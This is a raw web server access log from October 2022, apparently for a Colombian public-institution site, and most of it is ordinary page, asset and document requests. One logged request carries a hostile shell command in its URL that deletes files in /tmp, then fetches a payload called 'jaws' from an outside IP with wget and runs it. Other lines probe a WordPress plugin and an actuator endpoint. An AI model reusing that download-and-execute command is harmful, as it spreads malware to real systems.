172.22.2.4 - - [17/Oct/2022:12:13:10 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
87.250.224.69 - - [17/Oct/2022:12:13:31 -0500] "-" 408 -
172.22.2.4 - - [17/Oct/2022:12:11:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:12:12:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [17/Oct/2022:12:13:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
172.22.2.4 - - [17/Oct/2022:12:12:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
87.250.224.123 - - [17/Oct/2022:12:14:31 -0500] "-" 408 -
5.255.253.154 - - [17/Oct/2022:12:15:31 -0500] "-" 408 -
207.46.13.89 - - [17/Oct/2022:12:15:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%201350-1399.tif HTTP/1.1" 200 3333955
181.51.34.147 - - [17/Oct/2022:12:15:42 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.51.34.147 - - [17/Oct/2022:12:15:42 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.51.34.147 - - [17/Oct/2022:12:15:42 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [17/Oct/2022:12:17:10 -0500] "HEAD / HTTP/1.1" 200 -
95.108.213.60 - - [17/Oct/2022:12:17:31 -0500] "-" 408 -
201.245.192.253 - - [17/Oct/2022:12:18:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
114.119.141.73 - - [17/Oct/2022:12:19:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6577.pdf HTTP/1.1" 200 344928
172.22.2.4 - - [17/Oct/2022:12:17:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:12:19:27 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
172.22.2.4 - - [17/Oct/2022:12:18:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
5.255.253.165 - - [17/Oct/2022:12:20:31 -0500] "-" 408 -
190.157.242.76 - - [17/Oct/2022:12:21:03 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 326080
186.155.73.227 - - [17/Oct/2022:12:21:30 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.155.73.227 - - [17/Oct/2022:12:21:30 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.155.73.227 - - [17/Oct/2022:12:21:30 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [17/Oct/2022:12:21:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42467
201.245.192.253 - - [17/Oct/2022:12:21:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43583
157.55.39.25 - - [17/Oct/2022:12:21:57 -0500] "GET /BLA/resoluciones/AUTOS%202022/5388.pdf HTTP/1.1" 200 380508
216.245.221.92 - - [17/Oct/2022:12:22:09 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Oct/2022:12:23:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
207.46.13.211 - - [17/Oct/2022:12:24:12 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Frailejon-escenario.jpg HTTP/1.1" 200 357472
185.191.171.38 - - [17/Oct/2022:12:24:31 -0500] "-" 408 -
185.191.171.38 - - [17/Oct/2022:12:24:46 -0500] "-" 408 -
172.22.2.4 - - [17/Oct/2022:12:23:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:12:24:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [17/Oct/2022:12:27:09 -0500] "HEAD / HTTP/1.1" 200 -
157.90.126.79 - - [17/Oct/2022:12:27:14 -0500] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404 1165
87.236.176.208 - - [17/Oct/2022:12:27:41 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [17/Oct/2022:12:27:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
201.245.192.253 - - [17/Oct/2022:12:28:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
157.55.39.202 - - [17/Oct/2022:12:28:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/4392.pdf HTTP/1.1" 304 -
114.119.141.52 - - [17/Oct/2022:12:30:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2188.pdf HTTP/1.1" 200 493579
172.22.2.4 - - [17/Oct/2022:12:29:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:12:31:46 -0500] "GET /BLA/boletinlegal/actuator/gateway/routes HTTP/1.1" 404 1018
201.245.192.253 - - [17/Oct/2022:12:31:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42467
201.245.192.253 - - [17/Oct/2022:12:31:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43583
172.22.2.4 - - [17/Oct/2022:12:30:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [17/Oct/2022:12:32:09 -0500] "HEAD / HTTP/1.1" 200 -
173.252.83.15 - - [17/Oct/2022:12:32:41 -0500] "GET /images/Senderos1.jpeg HTTP/1.1" 200 172777
201.245.192.253 - - [17/Oct/2022:12:33:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
157.55.39.202 - - [17/Oct/2022:12:34:13 -0500] "GET /BLA/resoluciones/00000872.tif HTTP/1.1" 404 1018
157.55.39.25 - - [17/Oct/2022:12:34:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1207.pdf HTTP/1.1" 304 -
172.22.2.4 - - [17/Oct/2022:12:35:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [17/Oct/2022:12:37:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:12:36:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
201.245.192.253 - - [17/Oct/2022:12:38:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
172.22.2.4 - - [17/Oct/2022:12:41:06 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 304 -
201.245.192.253 - - [17/Oct/2022:12:41:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42467
201.245.192.253 - - [17/Oct/2022:12:41:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43583
156.214.222.180 - - [17/Oct/2022:12:41:59 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [17/Oct/2022:12:42:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:12:41:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.202 - - [17/Oct/2022:12:43:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20301-350/00000337.tif HTTP/1.1" 200 57370
157.55.39.142 - - [17/Oct/2022:12:43:25 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
201.245.192.253 - - [17/Oct/2022:12:43:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
172.22.2.4 - - [17/Oct/2022:12:41:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [17/Oct/2022:12:47:09 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.40 - - [17/Oct/2022:12:48:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001756.tif HTTP/1.1" 200 171614
201.245.192.253 - - [17/Oct/2022:12:48:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
172.22.2.4 - - [17/Oct/2022:12:46:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Oct/2022:12:47:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
190.157.242.76 - - [17/Oct/2022:12:50:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3394.pdf HTTP/1.1" 200 374332
172.22.2.4 - - [17/Oct/2022:12:50:08 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [17/Oct/2022:12:50:08 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [17/Oct/2022:12:50:08 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [17/Oct/2022:12:50:08 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [17/Oct/2022:12:50:08 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [17/Oct/2022:12:50:08 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [17/Oct/2022:12:50:08 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
186.28.204.128 - - [17/Oct/2022:12:50:24 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
186.28.204.128 - - [17/Oct/2022:12:50:26 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
186.28.204.128 - - [17/Oct/2022:12:50:27 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
186.28.204.128 - - [17/Oct/2022:12:50:27 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
186.28.204.128 - - [17/Oct/2022:12:50:29 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.28.204.128 - - [17/Oct/2022:12:50:31 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
186.28.204.128 - - [17/Oct/2022:12:50:31 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
186.28.204.128 - - [17/Oct/2022:12:50:31 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
186.28.204.128 - - [17/Oct/2022:12:50:31 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
186.28.204.128 - - [17/Oct/2022:12:50:32 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
186.28.204.128 - - [17/Oct/2022:12:50:32 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
186.28.204.128 - - [17/Oct/2022:12:50:32 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
186.28.204.128 - - [17/Oct/2022:12:50:32 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
186.28.204.128 - - [17/Oct/2022:12:50:32 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
186.28.204.128 - - [17/Oct/2022:12:50:32 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
186.28.204.128 - - [17/Oct/2022:12:50:32 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
186.28.204.128 - - [17/Oct/2022:12:50:32 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
186.28.204.128 - - [17/Oct/2022:12:50:33 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
186.28.204.128 - - [17/Oct/2022:12:50:42 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
186.28.204.128 - - [17/Oct/2022:12:50:42 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
186.28.204.128 - - [17/Oct/2022:12:50:43 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
186.28.204.128 - - [17/Oct/2022:12:50:45 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
186.28.204.128 - - [17/Oct/2022:12:50:45 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
186.28.204.128 - - [17/Oct/2022:12:50:47 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
186.28.204.128 - - [17/Oct/2022:12:51:12 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
186.28.204.128 - - [17/Oct/2022:12:51:12 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
186.28.204.128 - - [17/Oct/2022:12:51:12 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
186.28.204.128 - - [17/Oct/2022:12:51:12 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
186.28.204.128 - - [17/Oct/2022:12:51:12 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
186.28.204.128 - - [17/Oct/2022:12:51:12 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
186.28.204.128 - - [17/Oct/2022:12:51:12 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
186.28.204.128 - - [17/Oct/2022:12:51:12 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
186.28.204.128 - - [17/Oct/2022:12:51:12 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
186.28.204.128 - - [17/Oct/2022:12:51:12 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
186.28.204.128 - - [17/Oct/2022:12:51:12 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
186.28.204.128 - - [17/Oct/2022:12:51:13 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
186.28.204.128 - - [17/Oct/2022:12:51:13 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
186.28.204.128 - - [17/Oct/2022:12:51:13 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
186.28.204.128 - - [17/Oct/2022:12:51:13 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
